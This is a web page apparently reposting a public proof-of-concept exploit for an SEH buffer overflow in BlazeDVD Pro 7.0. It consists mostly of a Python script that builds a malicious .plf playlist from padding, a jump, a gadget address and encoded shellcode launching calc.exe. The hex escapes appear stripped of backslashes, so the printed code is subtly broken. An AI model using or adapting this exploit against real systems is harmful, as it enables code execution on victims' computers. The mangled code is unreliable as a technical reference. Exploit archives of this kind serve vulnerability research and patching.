Home / os / blackberry

BlazeDVD Pro 7.0 Buffer Overflow

Posted on 20 August 2014

# BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH
# Date: 19.08.2014
# Exploit Author: metacom
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Win 7 EN, Win 8.1

#!/usr/bin/python

from struct import pack

buffer= "x41" * 608
nseh="xebx06xffxff"
seh=pack("<I", 0x6030F817) #6030F817 5E POP ESI Configuration.dll
nops="x90" * 50
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/alpha_mixed -c 1 -b 'x00x0ax0dxff'
shell=("xdbxcdxd9x74x24xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x69x6cx6bx58x4fx79x55x50x75x50x35"
"x50x33x50x4bx39x49x75x66x51x4ax72x52x44x6e"
"x6bx70x52x44x70x6ex6bx42x72x44x4cx4cx4bx63"
"x62x64x54x6ex6bx42x52x54x68x34x4fx6cx77x63"
"x7ax35x76x65x61x4bx4fx74x71x4fx30x6cx6cx65"
"x6cx71x71x53x4cx46x62x76x4cx37x50x49x51x68"
"x4fx76x6dx57x71x6bx77x7ax42x7ax50x32x72x42"
"x77x4cx4bx42x72x44x50x6cx4bx31x52x37x4cx55"
"x51x7ax70x4cx4bx33x70x62x58x4fx75x6bx70x51"
"x64x52x6ax77x71x78x50x42x70x4cx4bx52x68x47"
"x68x4cx4bx46x38x37x50x77x71x5ax73x58x63x55"
"x6cx53x79x4ex6bx66x54x4cx4bx73x31x38x56x75"
"x61x59x6fx36x51x59x50x4cx6cx6ax61x4ax6fx34"
"x4dx46x61x79x57x77x48x49x70x31x65x4bx44x65"
"x53x43x4dx6bx48x65x6bx53x4dx64x64x53x45x6d"
"x32x73x68x6ex6bx70x58x67x54x67x71x39x43x62"
"x46x6cx4bx76x6cx42x6bx4ex6bx62x78x45x4cx37"
"x71x38x53x4cx4bx46x64x4cx4bx45x51x48x50x4c"
"x49x50x44x71x34x47x54x71x4bx31x4bx63x51x31"
"x49x63x6ax70x51x69x6fx39x70x46x38x73x6fx53"
"x6ax4ex6bx56x72x58x6bx4bx36x31x4dx42x4ax55"
"x51x4cx4dx4dx55x38x39x65x50x65x50x65x50x56"
"x30x62x48x75x61x4cx4bx62x4fx4fx77x79x6fx49"
"x45x6fx4bx5ax50x6cx75x4dx72x36x36x42x48x59"
"x36x4ax35x4dx6dx6dx4dx49x6fx49x45x45x6cx45"
"x56x43x4cx76x6ax4fx70x39x6bx4bx50x42x55x36"
"x65x4dx6bx51x57x44x53x62x52x50x6fx62x4ax77"
"x70x56x33x6bx4fx4ax75x35x33x35x31x72x4cx33"
"x53x74x6ex32x45x43x48x75x35x37x70x41x41")

poc = buffer + nseh + seh + nops + shell
try:
 out_file = open("BlazeDVD.plf",'w')
 out_file.write(poc)
 out_file.close()
 print("[*] Malicious plf file created successfully")
except:
 print "[!] Error creating file"

 

TOP

Malware :

Exploits :